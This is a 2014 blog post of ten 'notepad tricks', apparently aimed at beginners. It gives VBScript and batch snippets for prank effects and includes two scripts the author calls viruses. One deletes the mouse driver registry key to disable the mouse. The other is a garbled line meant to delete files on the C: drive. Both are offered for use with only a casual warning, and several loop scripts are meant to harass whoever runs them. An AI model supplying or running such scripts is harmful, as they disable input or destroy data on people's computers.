Tuesday, December 2, 2014

Top 10 Best cool notepad tricks that you should try.

Hi friends in this tutorial i am gonna list top 10 cool notepad ticks.Notepad is a plain-text editor which is included in all windows.It is a built in apps.It is used to open plain text files.Notepad offers only the most basic text manipulation functions, such as finding text.Basically many of us use the notepad in order to store information.But have you ever tried to use it in different way i.e for making fun?If not i will teach you some funny and best notepad tricks.
Top 10 Best cool notepad tricks that you should try.

1.Disco lights on keyboard:

Disco lights on Keyboard.
  • In order to do this open notepad and copy the code in it. 
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
wshshell.sendkeys "{NUMLOCK}"
wshshell.sendkeys "{SCROLLLOCK}"
loop
  • Save it with an extension .vbs.
  • In order to stop it just go the Task manager and search for wscript.exe as show in the image.
Stop the wscript.exe in Task manager.

2.Disabling the mouse by creating a virus:


Disabling the mouse.
  • It is harmful so think before you do it.
rem Disable Mouse
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
  • Save it with an extension .bat. 

3.Format c drive by creating a virus:

Format c drive by creating a virus.
  •  This one is too harmful so think before you do it. 
@ECHO OFF DEL C:\ *.*|Y
  •  Save this file with an extension .bat.
  • I recommend you to use this one carefully.

4.Making your computer speak to you

Make your computer speak to you.
  • In order to do this open notepad and copy the code.
Dim speaks, speech
speaks="Welcome to your PC, Username"
Set speech=CreateObject("sapi.spvoice")

speech.Speak speaks
  • Now save it as .vbs file.If you want to make it run at the time of windows start,just move the file to starts up as shown below.

All programs>Startup
Moving the file to start up folder.

5.Folder lock :

Lock a folder using notepad.

6.Continuously eject CD/DVD Drive:

Continuously eject C/DVD Rom.
  • Open the notepad and copy the code given below.
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
  • save it with an extension .vbs.
  • You can stop it by going into task manager>Processes>Wscript.exe.

7.Matrix Effect trick:

Matrix effect trick in CMD.
  • In order to do this open notepad and copy the code in it.
@echo off
color 02
:start
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
goto start
  • Save it as .bat file. 

    8.Repeating a message continuously:

    •   It will repeat continuously as long as you open it.
    @ECHO off

    :Begin

    msg * Hi

    msg * Welcome to worldtech360

    msg * Have a nice time

    GOTO BEGIN  
    • Save the above one with an extension .bat.

    9.Toggle Capslock:

    Toogle Capslock effect.
    • Open Notepad and copy the code.
    Set wshShell =wscript.CreateObject(“WScript.Shell”)
    do
    wscript.sleep 100
    wshshell.sendkeys “{CAPSLOCK}”
    loop
    • Save it with an extension .vbs.
    • You can stop by going in to the task manger and closing wscript.exe application.

    10.Making Personal dairy:

    • Open notepad and type .LOG.
    • Now save the file with .txt and with any name.
    • Open the file once again,now you will find the time and date in it as shown below.
    Making personal dairy using Notepad.
    That's it friends now enjoy doing the above tricks and if you have any queries feel free to ask us through comments.

    No comments:

    Post a Comment